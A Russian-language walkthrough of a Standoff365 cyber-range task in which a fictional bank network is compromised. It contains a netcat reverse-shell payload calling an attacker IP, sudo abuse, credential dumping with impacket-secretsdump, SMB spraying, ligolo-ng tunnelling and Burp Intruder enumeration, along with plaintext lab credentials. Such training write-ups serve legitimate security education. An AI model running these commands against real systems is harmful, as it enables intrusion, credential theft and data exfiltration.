Содержание

WriteUp. Утечка информации о государственном контракте в Commercial Bank of Standoff

Прохождение задания ‘Прохождение задачи ‘Standoff365 - Industry - Банковская система - Утечка информации о государственном контракте в Commercial Bank of Standoff’.

ссылка на задание

Информация о задании

Название Утечка информации о государственном контракте в Commercial Bank of Standoff
Уровень Средний
Категория Pentest Machines
ОС Linux, Windows

Начало

В задании сказано:

В межбанковском платежном поручении, отправленном из филиала Commercial Bank of Standoff, найдите информацию о фактической сумме платежа по контракту Государства F с компанией Horns and Hoofs.

Подключаемся по VPN

sudo openvpn *.ovpn 
/writeup-4.ru/1.JPG

Разведка

От сюда берем информацию о сетях. Так в задании сказано про Commercial Bank of Standoff (cbs), то нам необходимы сети: Внешний периметр: 10.124.0.128/26 и Внутренний периметр: 10.154.4.0/23.

nmap 10.124.0.128/26 -T5 -v --open -A -Pn

Обратите внимание на параметр -Pn

/writeup-4.ru/2.JPG

Нас интересует IP 10.124.0.134

/writeup-4.ru/3.JPG

Проверяем сайт:

/writeup-4.ru/4.JPG

Воспользуемся инструментом dnsrecon

dnsrecon -r 10.124.0.128/26  -n 10.124.0.162

IP 10.124.0.162 это там где 53 порт

/writeup-4.ru/5.JPG

Через Burp производим разведку дальше, а именно тыкаем везде и всюду, да поиска “чего-то интересного”. При вводе на форме “Обратной связи” находим что-то интересное. Пишет, что не найдено api.

/writeup-4.ru/6.JPG
/writeup-4.ru/7.JPG

Убираем лишнее api

/writeup-4.ru/8.JPG

Эксплуатация

Предпологаем что тут есть уязвимость вида: “десериализации PHP”

Пытаемся эксплуатировать уязвимость и выполнить обратный шелл и при этом найти правильный параметр s:

system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.127.245.254 4444 >/tmp/f')
/writeup-4.ru/9.JPG

Выполняем, видим что мы поймали шел

/writeup-4.ru/10.JPG

Дальнейшая разведка

Проверяем директорию /home на наличие файлов и видим файл history.txt. Проверяем данный файл и получаем креды.

/writeup-4.ru/11.JPG

Подключение по SSH на 10.124.0.163 и чтение файлов других пользователей

Подключаемся по SSH на 10.124.0.163, который мы нашли ранее при сканировании сети nmap. Пользователь: jack Пароль:rN9YvGXqd2b3RYrD21r7

ssh jack@10.124.0.163
/writeup-4.ru/12.JPG

Вводим команду на проверку привилегий. Видим что есть “высокие” права на cat

sudo -l
/writeup-4.ru/13.JPG

Проверяем все файлы истории всех пользователей. Находим в истории root некий файл .wincreds пользователя astridion

/writeup-4.ru/14.JPG

Проверяем данный файл. Находим креды

/writeup-4.ru/15.JPG

Создание туннеля во внутреннюю сеть

Для создания туннеля во внутреннюю сеть будем использовать ligolo-ng качаем тут. Нам нужны agent и proxy. Качаем себе на машину

/writeup-4.ru/16.JPG

Поднимаем http сервер у себя на машине на 8000 порту

python3 -m http.server 8000
/writeup-4.ru/17.JPG

Переходим в папку /tmp и качаем agent

curl -O http://10.127.245.254:8000/agent
/writeup-4.ru/18.JPG

Готовим ligolo у себя на тачке

sudo ip tuntap add user kali mod tun ligolo
sudo ip link set ligolo up
/writeup-4.ru/19.JPG

Запускаем прокси на порту 1155

./proxy -selfcert -laddr 0.0.0.0:1155
/writeup-4.ru/20.JPG

Переходим на jmp и делаем исполняемый агент и запускаем

chmod +x agent 
./agent -connect 10.127.245.254:1155 -ignore-cert
/writeup-4.ru/21.JPG

Далее снова переходим на свою тачку и видим что появилась сессия, входим в нее и запускаем

session
start
/writeup-4.ru/22.JPG

Ну а теперь необходимо “завернуть” внутреннюю сеть банка cbs 10.154.4.0/23 в интерфейс ligolo

sudo ip route add 10.154.4.0/23 dev ligolo 
/writeup-4.ru/23.JPG

Сбор информации о внутренней сети банка cbs 10.154.4.0/23

Воспользуемся утилитой nxc (протокол smb) и кредами, которые нашли ранее, а именно: Пользователь: astridio Пароль: ZYSE6G01pICXQByw7JO

nxc smb 10.154.4.0/23 -u astridion -p zZYSE6G01pICXQByw7JO
/writeup-4.ru/24.JPG

Проверяем на наличие сервисов с помощью утилиты nmap на всех портах (-p-)

nmap 10.154.4.166 -T5 -v --open -A -p-
/writeup-4.ru/26.JPG

Доступ по RDP, и поиск информации

Пробуем получить дамп с машины 10.154.4.166, с помощью утилиты impacket-secretsdump и видим пароль пользователя helpdesk

impacket-secretsdump 'cbs.stf/astridion':'zZYSE6G01pICXQByw7JO'@10.154.4.166  
/writeup-4.ru/25.JPG

Получаем доступ по RDP. И запускаем PowerShell от имени Администратора

xfreerdp3 /v:10.154.4.166:33389 /u:helpdesk /p:9i8pwK95TQ5bWtl7fadJ /d:cbs.stf  
/writeup-4.ru/28.JPG

Прошу обратить внимание, что при выполнении команды доступа по RDP, вы можете получать доступ на разные тачки!

/writeup-4.ru/27.JPG

И начинаем искать везде и всюду

/writeup-4.ru/31.JPG

А теперь смотрим внимательно))))

/writeup-4.ru/32.JPG

Также обратим внимание на вот этот ярлык, у данного пользователя.

/writeup-4.ru/29.JPG

Выполнение НС

Пробуем зайти на данный ресурс, с нашей атакующей тачки, не получается. Проверяем данный порт.

/writeup-4.ru/33.JPG

Видим что он фильтруется, значит есть вероятность, что необходимо сделать туннель от тачки WS05, где был найден файл

Кидаем агента лиголо на тачку

/writeup-4.ru/34.JPG

Переходим в директорию и запускаем агента

./agent.exe -connect 10.127.245.254:1155 -ignore-cert
/writeup-4.ru/35.JPG

Идем на нашу тачку, и проверяем

/writeup-4.ru/36.JPG
stop
session
TAB
start
/writeup-4.ru/37.JPG
/writeup-4.ru/38.JPG

Проверяем данный порт

/writeup-4.ru/39.JPG

Заходим на данный ресурс http://10.154.4.170:30003/

/writeup-4.ru/40.JPG

В задании сказано, что необходимо в межбанковском платежном поручении, отправленном из филиала Commercial Bank of Standoff, найдите информацию о фактической сумме платежа по контракту Государства F с компанией Horns and Hoofs. Т.е. ищем в OUTBOX данный платеж

/writeup-4.ru/41.JPG

В ручную это конечно долго, мы сделай по простому, а именно в Burp прочитаем все запросы, и Match по слову “Horns”.

Прошу обратить внимание, что при выполнении ниже операций в Burp, необходимо делать быстро - так как могут “протухнуть” куки и результаты вы не сможете увидеть! Поэтому во время Intruder проверяем выполнение запроса, т.е. Status code = 200!

Рекомендация: выполнять запросы по где-то по 3.000 на первую цель (Intruder). Не забываем обновить куки!

Забираем первый и последние запросы, который показывают платежки:

/writeup-4.ru/42.JPG
/writeup-4.ru/44.JPG

Закидываем в Intuder, тип Cluster bomb, выбираем цели.

/writeup-4.ru/43.JPG

Выбираем Тип нагрузки “цифры”. В первой части нагрузки по частям, и так до 31081. Т.е. потом с 3000 по 6000, и так далее, с обновлением куки.

/writeup-4.ru/45.JPG
/writeup-4.ru/46.JPG
/writeup-4.ru/51.JPG

Запускаем и дожидаемся выполнения пока будет совпадение.

/writeup-4.ru/47.JPG

Перебираем данную платежки, и после видим результат. НС реализована.

/writeup-4.ru/50.JPG